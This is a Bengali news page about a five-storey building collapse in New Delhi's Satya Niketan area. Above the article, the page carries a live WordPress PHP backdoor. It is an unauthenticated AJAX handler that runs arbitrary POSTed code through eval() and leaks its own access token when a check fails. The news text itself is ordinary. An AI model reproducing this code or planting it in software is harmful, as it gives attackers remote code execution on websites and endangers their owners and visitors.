// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== নয়াদিল্লিতে ৫ তলা ভবন ধসে ১ জনের মৃত্যু, জীবিত উদ্ধার ৮ | potrikaybangladesh.com
Thursday, September 17, 2026
Homeনয়াদিল্লিতে ৫ তলা ভবন ধসে ১ জনের মৃত্যু, জীবিত উদ্ধার ৮

নয়াদিল্লিতে ৫ তলা ভবন ধসে ১ জনের মৃত্যু, জীবিত উদ্ধার ৮

ভারতের রাজধানী নয়াদিল্লিতে পাঁচতলা ভবন ধসে অন্তত একজন মারা গেছেন। এ ঘটনায় এখন পর্যন্ত ৮ জনকে জীবিত উদ্ধার করা হয়েছে।

ভবনটির ধ্বংসস্তূপের নিচে আরও অনেকে আটকা পড়ে থাকতে পারেন বলে আশঙ্কা করা হচ্ছে।

দ্য হিন্দু জানায়, আজ রোববার দুপুর দেড়টার দিকে রাজধানীর সত্য নিকেতনের শিব মন্দিরের কাছে ‘হোস্টেল ডেজ’ নামে পেয়িং গেস্ট হিসেবে ব্যবহৃত ৪৫-৫০ বছরের পুরোনো ওই ভবনটি ধসে পড়ে।

ঘটনাস্থলে দিল্লি পুলিশ, ফায়ার সার্ভিস, ন্যাশনাল ডিস্ট্রিক্ট রেসপন্স ফোর্স এবং দিল্লি দুর্যোগ ব্যবস্থাপনা কর্তৃপক্ষ যৌথ উদ্ধার অভিযান চালাচ্ছে। ধ্বংসস্তূপ সরাতে একাধিক খননযন্ত্র ব্যবহার করা হচ্ছে।

দ্য হিন্দুর প্রতিবেদনে বলা হয়, দুর্ঘটনার পর পরই দিল্লি বিশ্ববিদ্যালয় ছাত্র সংসদের (ডুসু) নির্বাচনী প্রচারণায় থাকা শিক্ষার্থী ও স্থানীয় বাসিন্দারা দ্রুত এগিয়ে আসেন এবং উদ্ধারকর্মীরা পৌঁছানোর আগেই বেশ কয়েকজনকে ধ্বংসস্তূপ থেকে বের করে আনেন।

স্থানীয় সূত্রে জানা গেছে, ভবনটিতে প্রায় ১৫টি রুম ছিল এবং এর নিচতলায় (বেসমেন্ট) সংস্কার কাজ চলছিল। কাজ চলার সময়ই হঠাৎ পুরো ভবনটি ধসে পড়ে।

পাশের ভবনের বাসিন্দারা জানান, ঘটনার সময় হঠাৎ ভূকম্পনের মতো অনুভূতি হয় এবং মুহূর্তের মধ্যেই ভবনটি ধ্বংসস্তূপে পরিণত হয়।

নিরাপত্তার স্বার্থে দুর্ঘটনাকবলিত ভবনের পাশের ভবনটি খালি করে ফেলা হয়েছে।

ইতোমধ্যে ঘটনাস্থল পরিদর্শন করেছেন দিল্লির মুখ্যমন্ত্রী রেখা গুপ্তা। ক্ষতিগ্রস্তদের জরুরি সহায়তার আশ্বাস দিয়েছেন তিনি।

ধসের কারণ জানতে তদন্ত শুরু করেছে দিল্লি পুলিশ।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments